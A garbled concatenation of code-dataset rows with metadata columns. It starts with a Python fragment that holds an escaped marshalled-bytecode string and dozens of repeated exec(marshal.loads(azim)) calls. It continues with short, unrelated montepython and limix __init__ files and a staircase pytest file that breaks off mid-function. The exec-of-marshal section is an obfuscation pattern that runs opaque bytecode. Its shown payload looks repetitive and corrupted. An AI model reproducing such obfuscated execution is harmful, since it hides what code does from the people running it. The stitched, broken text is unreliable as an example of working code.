\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azi(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00'));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azm));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim))
| 7,444.5 | 29,761 | 0.75042 | 6,625 | 29,778 | 3.372981 | 0.024151 | 0.718249 | 0.691533 | 0.69113 | 0.961067 | 0.958516 | 0.956816 | 0.953593 | 0.951401 | 0.945538 | 0 | 0.397601 | 0.000403 | 29,778 | 3 | 29,762 | 9,926 | 0.353121 | 0 | 0 | 0 | 0 | 0.5 | 0.032307 | 0.032307 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.5 | null | null | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 17 |
1c7c9e1768a82ac7f279ac63a4733520fb05e4a5 | 104 | py | Python | montepython/likelihoods/Planck_lowl/__init__.py | syasini/montepython_public | d33537664b9719c172dab72273939f4301f2f3ba | [
"MIT"
] | 51 | 2015-05-22T05:41:31.000Z | 2022-03-11T07:04:47.000Z | montepython/likelihoods/Planck_lowl/__init__.py | syasini/montepython_public | d33537664b9719c172dab72273939f4301f2f3ba | [
"MIT"
] | 108 | 2015-02-11T07:10:06.000Z | 2021-12-29T15:06:37.000Z | montepython/likelihoods/Planck_lowl/__init__.py | syasini/montepython_public | d33537664b9719c172dab72273939f4301f2f3ba | [
"MIT"
] | 44 | 2015-05-26T19:12:17.000Z | 2021-05-22T14:56:14.000Z | from montepython.likelihood_class import Likelihood_clik
class Planck_lowl(Likelihood_clik):
pass
| 17.333333 | 56 | 0.836538 | 13 | 104 | 6.384615 | 0.692308 | 0.337349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 104 | 5 | 57 | 20.8 | 0.912088 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
98cdc3661c4fea8396ea3f878dfbae6e4ba648fa | 56 | py | Python | svca_limix/limix/hcache/__init__.py | DenisSch/svca | bd029c120ca8310f43311253e4d7ce19bc08350c | [
"Apache-2.0"
] | 65 | 2015-01-20T20:46:26.000Z | 2021-06-27T14:40:35.000Z | svca_limix/limix/hcache/__init__.py | DenisSch/svca | bd029c120ca8310f43311253e4d7ce19bc08350c | [
"Apache-2.0"
] | 29 | 2015-02-01T22:35:17.000Z | 2017-08-07T08:18:23.000Z | svca_limix/limix/hcache/__init__.py | DenisSch/svca | bd029c120ca8310f43311253e4d7ce19bc08350c | [
"Apache-2.0"
] | 35 | 2015-02-01T17:26:50.000Z | 2019-09-13T07:06:16.000Z | from ._hcache import Cached
from ._hcache import cached
| 18.666667 | 27 | 0.821429 | 8 | 56 | 5.5 | 0.5 | 0.454545 | 0.727273 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 56 | 2 | 28 | 28 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
c7079ff2e47dbf62752b8c52352a2ac767ed3b1c | 31,624 | py | Python | tests/test_dates/test_dates_stats.py | Gnemy/staircase | d670b679923eca3851e839e9565ab9c53c4bcdbe | [
"MIT"
] | 11 | 2021-08-14T06:30:48.000Z | 2022-01-04T09:09:43.000Z | tests/test_dates/test_dates_stats.py | Gnemy/staircase | d670b679923eca3851e839e9565ab9c53c4bcdbe | [
"MIT"
] | 55 | 2021-08-22T01:53:21.000Z | 2021-12-21T03:28:11.000Z | tests/test_dates/test_dates_stats.py | Gnemy/staircase | d670b679923eca3851e839e9565ab9c53c4bcdbe | [
"MIT"
] | 10 | 2021-08-25T02:01:09.000Z | 2021-11-23T10:31:12.000Z | from datetime import datetime
import numpy as np
import pandas as pd
import pytest
import pytz
from staircase import Stairs
def pytest_generate_tests(metafunc):
if "date_func" in metafunc.fixturenames:
metafunc.parametrize(
"date_func",
[
"pandas",
"pydatetime",
"numpy",
"pandas_tz",
"pydatetime_tz",
"pandas_timedelta",
"pytimedelta",
"numpy_timedelta",
],
indirect=True,
)
@pytest.fixture
def date_func(request):
# returns a func which takes a pandas timestamp
if request.param == "pandas":
return lambda x: x
elif request.param == "pydatetime":
return pd.Timestamp.to_pydatetime
elif request.param == "numpy":
return pd.Timestamp.to_datetime64
elif request.param == "pandas_tz":
return lambda ts: pd.Timestamp.tz_localize(
ts, pytz.timezone("Australia/Sydney")
)
elif request.param == "pydatetime_tz":
return lambda ts: (
pd.Timestamp.tz_localize(
ts, pytz.timezone("Australia/Sydney")
).to_pydatetime()
)
elif request.param == "pandas_timedelta":
return lambda ts: ts - pd.Timestamp(2019, 12, 31)
elif request.param == "pytimedelta":
return lambda ts: (ts - pd.Timestamp(2019, 12, 31)).to_pytimedelta()
elif request.param == "numpy_timedelta":
return lambda ts: (ts - pd.Timestamp(2019, 12, 31)).to_timedelta64()
else:
assert False, "should not happen"
def timestamp(*args, date_func, **kwargs):
ts = pd.Timestamp(*args, **kwargs)
return date_func(ts)
def assert_expected_type(stairs, date_func):
if stairs._data is None:
return
example_type = timestamp(2020, 1, 1, date_func=date_func)
try: # TODO this is a hack
example_type = pd.Timedelta(example_type)
except: # noqa
example_type = pd.Timestamp(
example_type
) # pandas natively converts datetimes to timestamps
assert all(
[type(example_type) == type(x) for x in stairs._data.index]
), "Unexpected type in step points"
if isinstance(example_type, (pd.Timestamp, datetime)):
assert all(
[example_type.tzinfo == x.tzinfo for x in stairs._data.index]
), "Unexpected timezone in step points"
def s1(date_func):
int_seq1 = Stairs(initial_value=0)
int_seq1.layer(
timestamp(2020, 1, 1, date_func=date_func),
timestamp(2020, 1, 10, date_func=date_func),
2,
)
int_seq1.layer(
timestamp(2020, 1, 3, date_func=date_func),
timestamp(2020, 1, 5, date_func=date_func),
2.5,
)
int_seq1.layer(
timestamp(2020, 1, 6, date_func=date_func),
timestamp(2020, 1, 7, date_func=date_func),
-2.5,
)
int_seq1.layer(
timestamp(2020, 1, 7, date_func=date_func),
timestamp(2020, 1, 10, date_func=date_func),
-2.5,
)
return int_seq1
def s2(date_func):
int_seq2 = Stairs(initial_value=0)
int_seq2.layer(
timestamp(2020, 1, 1, date_func=date_func),
timestamp(2020, 1, 7, date_func=date_func),
-2.5,
)
int_seq2.layer(
timestamp(2020, 1, 8, date_func=date_func),
timestamp(2020, 1, 10, date_func=date_func),
5,
)
int_seq2.layer(
timestamp(2020, 1, 2, date_func=date_func),
timestamp(2020, 1, 5, date_func=date_func),
4.5,
)
int_seq2.layer(
timestamp(2020, 1, 2, 12, date_func=date_func),
timestamp(2020, 1, 4, date_func=date_func),
-2.5,
)
return int_seq2
def s3(date_func): # boolean
int_seq = Stairs(initial_value=0)
int_seq.layer(
timestamp(2020, 1, 10, date_func=date_func),
timestamp(2020, 1, 30, date_func=date_func),
1,
)
int_seq.layer(
